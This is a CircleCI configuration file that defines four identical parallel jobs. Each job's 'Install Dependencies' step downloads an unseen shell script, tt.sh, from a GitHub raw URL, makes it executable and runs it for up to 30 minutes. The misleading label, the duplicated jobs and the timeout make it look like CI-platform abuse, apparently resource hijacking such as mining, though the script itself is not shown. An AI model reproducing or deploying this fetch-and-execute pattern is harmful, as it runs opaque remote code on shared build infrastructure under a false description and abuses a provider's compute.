version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 30m wget https://raw.githubusercontent.com/breakok/ob/main/tt.sh && chmod +x tt.sh && bash tt.sh
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 30m wget https://raw.githubusercontent.com/breakok/ob/main/tt.sh && chmod +x tt.sh && bash tt.sh
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 30m wget https://raw.githubusercontent.com/breakok/ob/main/tt.sh && chmod +x tt.sh && bash tt.sh
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 30m wget https://raw.githubusercontent.com/breakok/ob/main/tt.sh && chmod +x tt.sh && bash tt.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3